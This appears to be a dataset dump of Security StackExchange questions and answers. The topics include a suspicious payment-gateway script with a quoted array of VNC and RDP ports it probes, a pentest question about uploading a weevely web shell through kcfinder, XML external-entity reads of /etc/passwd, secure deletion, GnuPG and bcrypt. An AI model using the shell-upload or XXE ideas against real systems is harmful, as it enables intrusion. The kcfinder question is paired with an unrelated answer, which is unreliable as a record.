source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
102,894
I have a freelance client that wants me to integrate a payment gateway into their Woocommerce site but I am being increasingly concerned about their choice of provider and the project as a whole. The Issues Against my advice the client has selected the gateway provider. The provider is a far eastern one that I have never heard of before called Payforasia. The first warning flag is the fact the english and chinese (I think it is Chinese) version of their website doesn't appear to load images correctly. I was provided documentation for the gateway API as a PDF and a simple PHP demo. They also gave me a login to the merchant front-end so I could monitor my test transactions. All fairly normal. I ran the demo on my localhost and managed to connect to the payment gateway but got a failure error response. The error was not listed in the documentation, in fact the possible errors list goes from 0001 to 0067. I was getting error 0068. The second warning flag. When I contacted the provider, through my client, to ask for up-to-date docs and for advice on the error. I was told that the docs are the latest and that the office was closed for over week due to a national holiday (!?!?!). They finally got back to me today and said the error was "probably" due to them not whitelisting the server IP and that they had resolved that now. I still get the same error. While I wait for them to come back to me on that I started digging into the demo code and rereading their documentation to see if I had missed something obvious. I noticed this line in their docs: csid String 100 Yes Capture the value through http://cm.js.dl.saferconnectdirect.com/csid.js Since the original testing, and while waiting for them to come off their week long national holiday, I had applied an SSL to my client's site and obviously the browser wouldn't load the insecure connection to the javascript. The URL to this is in the demo but right at the bottom after a huge number of returns between it and demo form markup. Another flag waves at me. Turns out after trying the protocol agnostic url and HTTPS that the csid.js is not available over a secure connection. So I copy the JS to the server and amended the link in the markup. This is where the flag waving really starts going mental. The script populates the CSID field with my user-agent string, my screen resolution, origin server and hashed data. It also, more worryingly, adds an iframe that appears to be a tracking image or something similar. The iframe fires off six strange connections using a wss:// protocol to localhost. I will admit at this point I panicked and came here to ask for advice. The JS is minified and appears to have a PHP eval() in it and what looks like encoded characters. I don't know how to decode this and I'm unsure if it is safe to continue digging further into the code. My Questions I need some advice. Am I being overly paranoid or do I have a genuine concern? Is it normal for a gateway provider to obfuscate their code like this? Should I advise my client to immediately change supplier? Should I walk away and chalk it up to experience? Any advice, suggestions or comments on this will be hugely appreciated. Sorry if my question is rambling and a bit long, I wanted to get as much background in as possible. Update After all the excellent advice, I just wanted to give you all a quick update. I brought up a lot of my concerns with my client, who did not react in the way I expect. I was accused of deliberately dragging my feet, inventing problems, being incompetent and received less professional questions as to my parentage. Relations between me and my client have definitely frosted. They insisted that I implement the gateway without SSL on the site AT ALL . When I refused and invited them to find another developer they backed down almost straight away and became a little more cordial, although I have not yet received an apology. Since then they have revealed that the gateway provider had whitelisted the wrong IP which was why I was still receiving the mysterious 0068 error. The gateway provider tried to pin that one on me until I provided Skype logs to the contrary. My client won't let me speak to the gateway provider directly, so the the IP address was garbled at some point between them. With regards to the insecure JavaScript, my client has suddenly provided me, late yesterday, with this URL https://online-safest.com/pub/csid.js . They haven't provided any further documentation or where they have got this script from. I have not tested this script yet. I'm not sure I want to continue with it so I've been dragging my feet. I need to have a think about it today. I will accept an answer tomorrow, unfortunately I can't accept multiple answers even though I have used the content of several. Update 2 Just a final update. I completed this project for my client but I fear my relationship with them is now irrecoverably damaged. They insisted that I put the gateway live without any testing beyond the fact a single test transaction went through. I've told them that any post-live issues they have they will need to find another developer as they have gone live without testing and forfeited my normal support period. You could argue that it is unethical for me to release code into the wild that could be buggy and dangerous for end-users, however I saw no other way to easily exit the contract. I have given them full access to the private GIT repo containing the source which contains all the documented interaction between me and the client. Any future developer should be able to view it and make a decision from there. I further discovered that they have actually sub-contracted the job to me. All in all it is a project I am glad to be rid of.
Am I being overly paranoid or do I have a genuine concern? You have a genuine concern. Something is not right here. Is it normal for a gateway provider to obfuscate their code like this? Obfuscation is not, all by itself, abnormal. However, at the point they're trying to open localhost connections to RDP, VNC, and other ports, that's not obfuscation, that's completely inappropriate and malicious. Should I advise my client to immediately change supplier? I would advise your client that the code provided for integration appears to be malicious and that you cannot assume the supplier is either a) legitimate or b) capable of securing their business (and by extension, your client's). In addition, the supplier does not appear to integrate properly into a secure purchasing environment (the http: only js link), which calls into question their appropriateness even if legitimate. As per @JaimeCastells's comment to the question, there is no "payforasia" service provider listed at http://www.visa.com/splisting/searchGrsp.do . That could mean they're doing business under that name but are certified under a different name, or it could mean they're a "Level 2 Service Provider". Neither of those options is reassuring, quite frankly. Should I walk away and chalk it up to experience? If the client wants to continue with this supplier, I would definitely consider walking away. You can't make the client do the right thing, but you can choose not to be the one doing the wrong thing for them. Javascript analysis The intent of the obfuscated Javascript seems important. I've tried to untangle what's happening in the Javascript, and I'll link to readable partially de-obfuscated copies in this section. Overall, my impression is that the level of obfuscation used in these scripts exceeds what is commercially reasonable and becomes suspicious as a result. The limited amount of inferences I can draw about what it does are not inline with normal payments processing. Lacking better information, I presume this is malicious javascript. Here are files I'm looking at should you wish to explore the same question. These files have been run through the Online Javascript Beautifier and I've also used the Online Javascript Editor to pick apart bits of what the scripts do. You can see that even with the basic de-obfuscation applied, there's still a lot of obfuscation in place - check.js is full of arrays of integers which get processed by the code, and which are presumably more text or code to be executed. There are at least four scripts involved: csid.js tags.js check.js checkcid.js It's clear, for example, that the five ports the OP saw getting connection attempts are hardwired into check.js: td_0a = ['REF:63333', 'VNC:5900', 'VNC:5901', 'VNC:5902', 'VNC:5903', 'RDP:3389']; I will continue to poke at them, and may pastebin some copies, but I think it's reasonable to be distrustful of this code at this point.
{ "source": [ "https://security.stackexchange.com/questions/102894", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89402/" ] }
103,034
I've some stuff encrypted with GnuPG using gpg -e . When I decrypt them, the system does not ask for the passphrase, it decrypts it straight away. Does it store the secret key somewhere and uses it (I also stored my secret key in the GnuPG key chain, does it uses that)? How can I force the system to ask the passphrase every time?
Does it store the secret key somewhere and uses it (I also stored my secret key in the GnuPG key chain, does it uses that)? GnuPG only uses keys from your key chain, so it must be in there to use it. How can I force the system to ask the passphrase every time? Old versions of GnuPG uses the gpg-agent , which caches the passphrase for a given time. Use the option --no-use-agent or add a line no-use-agent to ~/.gnupg/gpg.conf to prevent using the agent. For newer versions (v2.1+), disable password caching for the agent by creating ~/.gnupg/gpg-agent.conf and adding the following lines: default-cache-ttl 1 max-cache-ttl 1 Restart the agent with: echo RELOADAGENT | gpg-connect-agent
{ "source": [ "https://security.stackexchange.com/questions/103034", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89099/" ] }
103,064
My company has a policy that files have to be shredded after they've been read. They provide with a tool shred.exe that I run on the file and it overwrites it with garbage in the file system before unlinking it. Today I forgot to do that and I wonder what to do now. How do I shred a file that's been unlinked? I'm using Windows 7 operating system. At the moment I tried creating thousands of tiny files ranging from 1mb to 200mb and just copying them a hundred times in the file system, but it takes way too long. Any other suggestions to do this quicker?
First of all (just to be on the safe side) verify the file isn't in the Recycle Bin. If it is, choose Restore and of course shred the recovered file (or maybe you can shred it while inside the Recycle Bin). If the file has been "truly deleted", recover it using an undelete tool such as Piriform's Recuva , then shred it for good. Note (suggested by Chris H): deletion under most filesystems is lazy , i.e. the space occupied by the file is simply marked as reusable. Until it is actually reused, the old data is still there and may be recovered. Undelete tools can work in two ways: they can mark that space as occupied again, or they can read the space and make a copy elsewhere. You want the first kind of undeletion, since you want to make the original space accessible to the shredder and destroy it -- not make a copy that will leave the original space still maybe recoverable again and again. A deleted file might be recoverable using Windows Shadow Copy , which is available since XP and enabled by default in Windows 7+. In an earlier edit I wrote 'chances are that it is disabled'. I should have written "on an unrelated note, ensure that it is disabled". VSS will not help you to shred a deleted file, since (as Chris H noticed) it will actually make another copy . You do not recover the original file space, which remains unshredded. For this reason, your company's IT admins should have disabled VSS on your computer . Otherwise, any "shredded" file may actually have several unshredded and recoverable copies lying around the disk. DIY overwrite However: a newly copied file (with VSS disabled) would be at the beginning of the free space area. If you copy a couple thousand files having the same size of the filesystem cluster size (or 1K if you're in doubt), you should be pretty sure that the file has been made unrecoverable even if it has not been "officially shredded". "Official" overwrite tools If you really want to be sure use a tool such as SDelete and tell it to wipe the disk's free space (be careful - not the allocated space!). Or you can use Piriform's CCleaner and do the same thing from the Tools menu. Another tool I just discovered by chance, and is recommended by Gutmann himself, is Eraser . Unless the disk is carefully examined with an electron scanning microscope, nobody's ever going to be able to tell whether the file was shredded with the mandated tool or not before becoming totally irretrievable. If you use SDelete or such in so-called "secure" mode (aka Gutmann erase ), even an electron scanning microscope will be none the wiser. Mandatory point: Gutmann erase is serious overkill even in Gutmann's own opinion . (The above may of course not apply if the company shred executable keeps and possibly transmits a record of the MD5 of every file it shreds) .
{ "source": [ "https://security.stackexchange.com/questions/103064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57387/" ] }
103,088
Suppose I found a USB memory stick lying around, and wanted to examine its contents in an attempt to locate its rightful owner. Considering that USB sticks might actually be something altogether more malicious than a mass storage device , is there any way I can do so safely? Is an electrical-isolation "condom" possible? Is there a way to manually load USB drivers in Linux / Windows / OS X so as to ensure that it won't treat the device as anything other than USB mass storage? After all, despite all the fear-mongering, it's still overwhelmingly more likely that what appears to be a misplaced memory stick actually is just a memory stick. Follow-up question: what measures do/can photo-printing kiosks take to guard against these kinds of attacks?
The USB-killer wouldn't kill your PC if you connected it through an opto-isolated hub. They do exist, (search: "opto-isolated usb hub") but as I've never used one myself I'm not going to recommend a specific model. They're not cheap though. Here is an example: Once you've dealt with the hardware aspect, you're then reduced to a more common problem. You've probably got more expert advice in other answers already, but my take is to unplug the hard drive (and all other writable storage) of a PC and boot it off a live CD or live USB stick (one which doesn't auto-run the contents of USB sticks of course). That's because it's maximum return for the effort given where I'm starting from. It would be sensible if you were going to make a habit of this to set even your live CD up to not auto-mount and not auto-install hardware, and to unplug the machine from the network. Booting with the suspect stick in place would also be a bad idea, in case it's bootable, but also because you may want to have access to event logs when you've just plugged it in.
{ "source": [ "https://security.stackexchange.com/questions/103088", "https://security.stackexchange.com", "https://security.stackexchange.com/users/27444/" ] }
103,233
If I sign a very short message (0 or 1) with my private key (and the receiving side verifies the signature using public key), is this less secure than to send the sufficiently long signed message?
The problem is not one of forging the signature, but of the meaning of the message . What is signed is not the message, but a hash of the message. The hash is always the same length. A message consisting of a single bit or byte can be hashed, so it can be signed, so it can be proved that your key signed it. But even if it can be proved, what does the message mean? If it is the answer to a "yes/no" question, you need to still include some reference to which question is being replied to, to prevent replay attacks . Alice: Is your name h22? Bob: Signed(Yes) (Eve overhears) Alice: Are you guilty of subversive activity? Eve: Signed(Yes) (Alice thinks this is from Bob) Therefore each answer needs to include some sort of reference to the question, so the answer cannot be reused. You can do this by giving each question a "number used only once" (nonce) which you include in the reply. Alice: Q1: Is your name h22? Bob: Signed(Q1:Yes) (Eve overhears) Alice: Q2: Are you guilty of subversive activity? Eve: Signed(Q1:Yes) (Alice is not fooled - this is the wrong question number, so it is a replay attack) Bob: Signed(Q2:No) (Alice knows this is really Bob now) Of course really Alice needs to sign her questions too. Otherwise Mallory could trick Bob into answering different questions. Alice: Q1: Is your name h22? Bob: Signed(Q1:Yes) Alice: Q2: Are you guilty of subversive activity? (Intercepted by Mallory) Mallory: Q2: Are you known as h? Bob: Signed(Q2:Yes) (Answering Mallory's question, but Alice thinks this is a reply to her). So it's important that the whole conversation is protected. In reality this generally means including the time and date as part of the message which is signed, as well as signing messages in both directions, and protecting against replay using a nonce.
{ "source": [ "https://security.stackexchange.com/questions/103233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45858/" ] }
103,393
I'm working on improving a CMS where the current implementation of storing password is just sha1(password) . I explained to my boss that doing it that way is incredibly insecure, and told him that we should switch to bcrypt, and he agreed. My plan was to just run all the existing hashes through bcrypt and store those in the password field, and then use the following psudo-code to check the password: correctPassword = bcrypt_verify(password, storedHash) or bcrypt_verify(sha1(password), storedHash) . This way, new users, or users who change their passwords will get "real" bcrypt hashes, while existing users won't all have to change their passwords. Are there any disadvantages to doing this? While it would probably be ideal to ask all users to choose a new password, do we lose much in the way of security by doing this? I was thinking that even if an attacker got access to both the database and the code, cracking won't be substantially faster even if the majority of the "input" to bcrypt was a 40 character hex string, since the slow part ( bcrypt_verify() ) still has to be invoked for each password attempt on each user.
Actually this is a good way to protect the otherwise unsecurely stored passwords. There is one weak point in this scheme though, which can be overcome easily in marking old hashes, so I would prefer this solution: if (checkIfDoubleHash(storedHash)) correctPassword = bcrypt_verify(sha1(password), storedHash) else correctPassword = bcrypt_verify(password, storedHash) Imagine an attacker getting hold of an old backup. He would see the SHA hashes, and could use them directly as passwords if you test with bcrypt_verify(...) or bcrypt_verify(sha1(...)) . Most bcrypt libraries add a mark of the used algorithm themselves, so it is not a problem if you add your own "double hash mark", but of course you can also use a separate database field for this: $2y$10$nOUIs5kJ7naTuTFkBy1veuK0kSxUFXfuaOKdOKf9xYT0KKIGSJwFa | hash-algorithm = 2y = BCrypt
{ "source": [ "https://security.stackexchange.com/questions/103393", "https://security.stackexchange.com", "https://security.stackexchange.com/users/50271/" ] }
103,524
Many companies have intranet websites that are not reachable via the internet. Usually they just use a self-signed certificate, which causes a bad habit for the users since they get used to just pressing OK on invalid CERT warnings. Question : How can they generate a certificate for their HTTPS websites using Let's Encrypt? Does the LTS web browsers have the Let's Encrypt as CA? Isn't it a privacy issue that private domain names, like my-company-private-intranet-site.com, could be leaked?
Let's Encrypt can only issue certificates for valid DNS names. So if your intranet uses a made-up domain name like intranet.mycompany.local then it won't work. If you have a real DNS name like intranet.mycompany.com (even if it doesn't resolve externally to your intranet), then you can use Let's Encrypt to issue certificates for it. If the domain does resolve externally to a server that can respond on port 80 (which need not actually be part of your intranet, if you have split-horizon DNS ), you can use the http-01 challenge. Alternatively, you can use the dns-01 challenge (fully supported in Certbot 0.10.0 and later, as well as other clients such as dehydrated , getssl and acme.sh ). Since this challenge works by provisioning DNS TXT records, you don't ever need to point an A record at a public IP address. So your intranet does not need to be reachable from the Internet, but your domain name does need to exist in the public DNS under your control. Let's Encrypt - and publicly trusted certificate authorities in general, due to Chrome's requirements - submit all issued certificates to public certificate transparency logs. As such, you should not expect your intranet (sub)domain name to remain secret if you obtain a certificate for it. Your intranet's security shouldn't be dependent on keeping its domain name secret anyway.
{ "source": [ "https://security.stackexchange.com/questions/103524", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76582/" ] }
103,540
Within our local education's I.T system, all websites served via HTTPS are blocked, except a select few websites which are 'authorized'. This results in some websites being unable to function properly (such as Google's jQuery libraries , which are served via HTTPS). I also remember reading an article a couple of years ago which said that HTTPS can cause problems with censor filters/proxies, as HTTPS connections cannot be intercepted & the page contents searched for blocked content ( I haven't seen this behavior in many filters, but one such software that does this is censornet ). Disregarding educational use, I have also found that a few shared WiFi hotspots also engage in this behavior (of which are unfiltered for the most part). For example I was travelling via Gatwick Airport (U.K) last year & all HTTPS sites were blocked on the official 'Gatwick Airport WiFi' network. Other than for filtering purposes, is there any reason to block HTTPS? HTTPS is paramount for websites that deal with private information (passwords, emails, etc), so I can't really see a good reason for blocking HTTPS.
The most probable reasons for blocking encrypted communications (i.e. HTTPS), include: Government & security related surveillance. It's easier for officials to intercept potential threats if they are in plain text. This is probably why the WiFi at the airport blocked HTTPS access. Hacking / Man in the Middle Attacks. If your communications are not encrypted, plain text usernames and passwords can be intercepted by someone operating the hot spot. You often see these open WiFi hotspots in locations where the public is likely to login, like airports and coffee shops. If they were simply filtering your traffic (blocking certain websites), the most direct way to do that is to simply block IP addresses or domain names. Blocking HTTPS most likely was used to ensure they could listen into your network traffic.
{ "source": [ "https://security.stackexchange.com/questions/103540", "https://security.stackexchange.com", "https://security.stackexchange.com/users/49573/" ] }
103,666
Could a VPS provider like DigitalOcean have access to the content of their users? In their terms of service they do not mention anything related to this question, but could they theoretically have access (e.g., via a backdoor)? Apart from a possible hack, how could I assure my clients that their content is only known by me, even if their data is not on my server?
When you host your data on other people's servers, then these people have full access to it. With a virtualized server, the data is written to the hard drive of the host system. The server administrators could look at that hard drive image at any time and thus get access to the data of your users. They can also monitor the network traffic. You could prevent access to the hard drive image by using full disk encryption. When the virtual machine encrypts all the data it writes on its virtual hard drive, that data is also encrypted when written on the physical hard drive of the host. To prevent monitoring of network traffic, you could make sure all traffic - both administrative and user-traffic - is strongly encrypted. But with some criminal energy, they can still monitor your data. When you reboot your machine, you will have to enter the disk encryption password through the remote administration console. That console is under their control, so they could use that to log your disk password. They can make a snapshot of your VM at any time, which dumps the whole RAM content to disk. This gives them access to all data currently in memory, including the decryption key of the virtual disk. When they control the VM hypervisor, they also control all the computations the virtual machines make. It's not easy to do, but it is theoretically possible to use this to break any cryptography which happens on it. Solution: Host your servers on your own premise where you have full access. But will Digital Ocean do that? This is what their privacy policy says: Server Data DigitalOcean does not have access to its users’ server data. The backend is locked away from the users’ support staff and only engineering staff has access to the physical servers where users’ virtual machines reside. DigitalOcean does not store users’ passwords or private SSH keys. DigitalOcean also does not request user login information to their servers. DigitalOcean does not review or audit any user data. This is what they say . Can you trust their words? Your decision to make. By the way, their Law Enforcement Guide might also be worth reading in this regard. It describes what information they suddenly do have access to when pressed by government officials.
{ "source": [ "https://security.stackexchange.com/questions/103666", "https://security.stackexchange.com", "https://security.stackexchange.com/users/84797/" ] }
103,671
So I have this challenge in pentesting to get a shell on a vulnerable webapp. I am an authenticated user and I know that the vulnerable app is kcfinder-2.51 which is a plugin for ckeditor_3.6.4 . I am trying to upload weevely shell, but the problem is that the server is configured to redirect everything to 404-page if it's a directory or if it's a wrong file. Another problem is that the upload directory is unique to every user even a non-authenticated user has a different upload directory. How do I know which upload directory the shell is uploaded on? And if I upload a .htaccess file in that directory can I enable directory listing or change the config?
When you host your data on other people's servers, then these people have full access to it. With a virtualized server, the data is written to the hard drive of the host system. The server administrators could look at that hard drive image at any time and thus get access to the data of your users. They can also monitor the network traffic. You could prevent access to the hard drive image by using full disk encryption. When the virtual machine encrypts all the data it writes on its virtual hard drive, that data is also encrypted when written on the physical hard drive of the host. To prevent monitoring of network traffic, you could make sure all traffic - both administrative and user-traffic - is strongly encrypted. But with some criminal energy, they can still monitor your data. When you reboot your machine, you will have to enter the disk encryption password through the remote administration console. That console is under their control, so they could use that to log your disk password. They can make a snapshot of your VM at any time, which dumps the whole RAM content to disk. This gives them access to all data currently in memory, including the decryption key of the virtual disk. When they control the VM hypervisor, they also control all the computations the virtual machines make. It's not easy to do, but it is theoretically possible to use this to break any cryptography which happens on it. Solution: Host your servers on your own premise where you have full access. But will Digital Ocean do that? This is what their privacy policy says: Server Data DigitalOcean does not have access to its users’ server data. The backend is locked away from the users’ support staff and only engineering staff has access to the physical servers where users’ virtual machines reside. DigitalOcean does not store users’ passwords or private SSH keys. DigitalOcean also does not request user login information to their servers. DigitalOcean does not review or audit any user data. This is what they say . Can you trust their words? Your decision to make. By the way, their Law Enforcement Guide might also be worth reading in this regard. It describes what information they suddenly do have access to when pressed by government officials.
{ "source": [ "https://security.stackexchange.com/questions/103671", "https://security.stackexchange.com", "https://security.stackexchange.com/users/55851/" ] }
103,672
If for example I have Magento-eCommerce and WordPress installed on the same server. Both have a database each with a different database username/password and both have different login details to the admins. If there was a serious vulnerability in a Magento plugin that allows Magento to be attacked, can that vulnerability be so bad that an attacker can use that vulnerability in Magento to attack WordPress?
If the Magento vulnerability led to a shell, then that shell could be used to get root access by a privilege escalation vulnerability. When that happens, the attacker has complete control over the system.
{ "source": [ "https://security.stackexchange.com/questions/103672", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
103,712
A colleague sent a .xml file to me earlier today, which was blocked by Outlook. As we were discussing the workaround (put it in a .zip), we got to wondering why .xml files are blocked. My colleague reckons it's because the browser is the default renderer for .xml files and there's possibly an attack vector by passing a html file with an xml extension, but I tried this on Firefox and I am shown the document tree as a bare xml file. Does anyone have any examples where an xml file could be added as an attachment to do something malicious (or at least, moreso than any other random attachment that isn't blocked)?
Possible XML based attacks are: XML bomb ( aka Billion LOLs attack ). This is an XML file that uses a recursive custom entity type definition to attack a vulnerable XML parser. The XML bomb has a very small size on disk, but expands up to a huge size when parsed, potentially exhausting the available memory on the victims device. External entity type that may not return . In this case the XML document defines an external entity type at a URL that either does not respond, or responds slowly. This could cause a DoS on the victims device. External entity type that expose sensitive information. This is similar to point 2 (and is explained at the same link), but in this case the external entity type attempts to expose sensitive local files (e.g. file:///etc/passwd ) Whether any of these attacks could succeed depend on the installed XML parser on the local machine. I think applications like newer versions of IE, Firefox etc. protect against these, but older versions or some custom software might be vulnerable.
{ "source": [ "https://security.stackexchange.com/questions/103712", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90239/" ] }
103,731
The NSA has had a large hand in the design of at least two significant encryption standards: the Digital Encryption Standard , and its successor, the Advanced Encryption Standard . Because of their involvement, there is much speculation of backdoors. Setting aside our tinfoil hats for a moment, have there been any official statements by the NSA or other involved organizations as to why the NSA have had a part in the encryption standards? Why it is in their interest to support the encryption of data? Especially when the usage of the encryption standards can't be enforced; the algorithms can be (and are) used by countries and corporations outside of the United States.
The NSA is a composite organization, that comprises several sub-entities called "directorates" with various scopes and goals. The NSA, as a whole, is supposed to have a multitude of roles; its signal intelligence role (often abbreviated as SIGINT, i.e. spying) is the one most people talk about, and is supposed to be handled by the SID (as "Signal Intelligence Directorate"). However, NSA is also supposed to ensure the information safety of US interests, and as such should help federal organizations and also big US private companies apply proper encryption, where encryption is needed. This defensive role falls largely within the scope of the IAD (Information Assurance Directorate). It is true that within the NSA, the balance of power substantially shifted towards SID after September 2001, but they still maintain a non-negligible defensive role. In any case, both DES and AES were standardized before that date. In the USA, federal standards are edited and published by a specific agency called NIST . NIST is not the NSA. However, when the NIST people deal with some cryptographic algorithms, they like to get inputs from the NSA because that's where the US government keeps its crypto-aware thinkers. The NSA itself likes to be consulted by NIST because they want to keep track of published cryptographic algorithms, both for attacking and defending (they want to know what algorithms they will be faced with when trying to eavesdrop, and they also want to know what algorithms they should advise big US companies to use to thwart foreign evildoers). On that subject, you may want to read this article which is about elliptic curves and "post-quantum crypto", and what the NSA says and thinks about it. It highlights that NSA is, first and foremost, a big governmental organization , and thus tends to behave like big governmental organizations do; in particular, some or even most of its actions are related to its own internal politics. There is quite a gap between "being involved" and "having a part". According to Don Coppersmith (one of the DES designers), the NSA, at some point, interacted with the IBM team, under the avowed goal to strengthen the algorithm. The NSA, at that time, still employed a substantial proportion of available cryptographers (this is no longer true), and had some knowledge of an as yet unpublished attack method, namely differential cryptanalysis . The NSA wanted to make sure that the new algorithm would resist such attacks. It turned out that the IBM team had also conceived the idea of differential cryptanalysis, and had already strengthened their design against it. So the NSA involvement reduced to asking the IBM researchers not to publish their findings. (As Leibniz would have put it, scientific discoveries are floating in the air, and when you have a new idea, chances are that several other people have the same idea at the same time. It is thus pretty hard to keep ahead of the rest of the World in scientific areas.) For the AES standardization process, NIST deliberately organized the whole competition as being very open; submitters were encouraged and even requested to publish all design criteria of their candidates. While one cannot logically preclude the possibility of bribery to inject a backdoor in one candidate, because it is very hard to prove a negative (that's the point about conspiracy theories: they cannot be rationally denied because they are beyond logic), most candidates, including the one finally chosen (Rijndael), had all their design elements fully explained, with no undisclosed dark area. Thus, NSA input in that matter was mostly a statement that they found nothing wrong with any candidate. (Cryptographers are also human beings and, as such, may occasionally indulge in gossip. At that time, the gut feeling of most of them was that if there was an NSA-sponsored candidate, then it was MARS , mostly because that was Don Coppersmith and IBM again. In any case, that algorithm was not very popular because it was overly complex and hard to fathom. Rijndael's structure was a lot more simpler.)
{ "source": [ "https://security.stackexchange.com/questions/103731", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38377/" ] }
103,805
In the UK, the company TalkTalk was recently hacked . It was later discovered, after 'investigation' that the hack was not as serious as it could have been (and less than expected). I'm wondering: How do organizations (not necessarily TalkTalk -- that's just what prompted me to ask) check what has been hacked? I'm sure there are many ways; but what are the 'main' ones?
In a word: Forensics . Computer forensics is the art of examining a system and determining what happened upon it previously. The examination of file and memory artifacts, especially file timelines, can paint a very clear picture of what the attacker did, when they did it, and what they took. Just as an example - given a memory dump of a Windows system, it is possible to extract not only the command lines typed by an attacker, but also the output that they saw as a result of running those commands . Pretty useful in determining impact, eh? Depending on the freshness of the compromise, it's possible to tell quite a lot about what happened. @AleksandrDubinsky suggested that it would be useful to outline the various Computer Forensic fields and techniques, which I'm happy to do for you. They include, but are not limited to, the following (I'm going to use my rough terms; they aren't official or comprehensive): Log/Monitor Forensics : The use of 'external' data such as centralized logs, firewall logs, packet captures, and IDS hits straddles the line between "Detection" and "Forensics". Some of the data, like logs (even centralized) cannot be trusted to be complete or even truthful, as attackers can filter it or inject it once they have control of the system. Off-the-system packet logging tools like the firewall, IDS, or packet recorders (such as (formerly) NetWitness ) are unlikely to be tampered with, but contain only a limited amount information; usually just a record of IP conversations and sometimes signatures (such as HTTP URLs) associated with malicious activity. Unless an unencrypted network connection was used in the compromise, these tools are rarely able to detail the activity during a compromise, and so (going back to the original question) don't "check what has been hacked." On the other hand, if an unencrypted connection (ftp) was used to exfiltrate data out , and full packets were recorded, then it's possible to know exactly what data the attacker ran away with. Live Forensics : More properly part of Incident Response, so-called "Live" forensics involves logging into the system and looking around. Investigators may enumerate processes, look in applications (e.g. browser history), and explore the file system looking for indications of what happened. Again, this is usually designed to verify a compromise happened, and not to determine the extent of a compromise, since a compromised system is capable of hiding files, processes, network connections, really anything it wants to. The plus side is that it allows access to memory-resident things (processes, open network connections) that aren't available once you shut the system down to image the disk (but, again, the system may be lying, if it's compromised!) Filesystem Forensics : Once a copy of the disk has been made, it can be mounted on a clean system and explored, removing any chance of the the compromised operating system "lying" about what files are in place. Tools exist to build timelines using the variety of timestamps and other metadata available, incorporating file data, registry data (on Windows), even application data (e.g. browser history). It's not just file write times that are used; file read times can indicate which files have been viewed and also which programs have been executed (and when). Suspicious files can be run through clean antivirus checkers, signatures made and submitted, executables loaded into debuggers and explored, "strings" used to search for keywords. On Unix, "history" files - if not turned off by the attacker - may detail the commands the attacker entered. On Windows, the Shadow Copy Service may provide snapshots of past activity that has since been cleaned up. This is the step most commonly used to determine the scope and extent of a compromise, and to determine what data may or may not have been accessed and/or exfiltrated. This is the best answer to how we "check what has been hacked." Disk Forensics : Deleted files disappear from the filesystem, but not from the disk. Also, clever attackers may hide their files in the "slack space" of existing files. These things can only be found by examining the raw disk bytes, and tools like The Sleuth Kit exist to rip that raw data apart and determine what it means about the past. If there was a .bash_history file, and the attacker deleted it as his last step before logging out, then that file may still exist as disk blocks, and be recoverable. Likewise, attack tools that were downloaded and temporary data files that were exfiltrated can help determine the extent of the compromise. Memory Forensics : If the investigator can get there soon enough, and get a snapshot of the memory of the system involved, then they can thoroughly plumb the depths of the compromise. An attacker must compromise the kernel to hide from programs, but there's no way to hide what's been done if a true image of kernel memory can be made. And just as the disk blocks contain data that has since been removed from the filesystem, the memory dump contains data that was in memory in the past (such as command line history and output!) that has not yet been overwritten... and most data is not overwritten quickly. Want more? There are training programs and certifications to learn Forensics; probably the most common publicly available training is from SANS . I hold their GCFA ("Forensic Analyst") certification. You can also review the Challenges from the Honeynet Project , in which parties compete to unravel the cases given disk images, memory dumps, and malware samples from actual compromises - they submit their reports of what they found, so you can see the sorts of tools used and findings made in this field. Anti-Forensics is a hot topic in the comments - basically, "can't the attacker just hide their traces?" There are ways to chip away at it - see this list of techniques - but it's far from perfect and not what I'd call reliable. When you consider that "the 'God' of cyberespionage" went so far as to occupy the firmware of the hard drive to maintain access to a system without leaving a trace on the system itself - and still got detected - it seems clear that, in the end, it's easier to detect evidence than it is to erase it.
{ "source": [ "https://security.stackexchange.com/questions/103805", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90345/" ] }
103,901
The password manager that I use has instructions to migrate to a new file format: Export existing passwords to a temporary text file Change password manager to new format Import passwords from temporary text file Securely erase the temporary text file My hard drive is an SSD (solid state drive), which has it's own issues when it comes to securely deleting files (see https://serverfault.com/questions/199672/secure-delete-on-ssd ) Given that I also have full disk encryption turned on, is it safe to just delete the text file normally? Is there a more secure way to do this (use a RAM disk, export to USB stick then destroy USB stick after the data has been imported?)
I would still recommend using secure delete in your scenario. Should your machine be compromised when you are logged in (malware etc), full disk encryption will not protect you from a undelete operation via C&C malware for example. SSDs have problems erasing files but a number of manufacturers provide utilities for their drives to securely erase a file and while not always perfect has been reviewed to perform well. Furthermore, if your drive supports TRIM, normal Windows 7+ delete should also function fine when the recycle bin is cleaned. This post helped me understand a lot more last year, hope it helps you: https://raywoodcockslatest.wordpress.com/2014/04/21/ssd-secure-erase/ As for a more secure way to delete the password file, sure there are plenty of other creative ways but that all depends on your appetite for pain. Damn good question, thank you for that!
{ "source": [ "https://security.stackexchange.com/questions/103901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87864/" ] }
103,908
I look after a system which holds a lot of "low grade" information, nothing financial but name/address/email etc. Someone has suggested that we up the security from the current in house password encryption algorithm to use ICO recommended hash/salting. I've done a bit of reading around and am struggling to see the benefit, my argument has gone back to the "experts" who are suggesting this but they wont (can't) answer my fairly simple question. As far as I can tell, hashing/salting prevents the password being read and decrypted by a hacker, and it's excellent for this, no argument. But unless I'm missing something, in order to read the password value the hacker has to have access to the database so they can steal the password values?... if they have access to the database then they don't actually need the password(s) as they can just steal the data direct from the database i.e. the application access they gain from the passwords would give them nothing more than reading the database direct?... What am I missing?
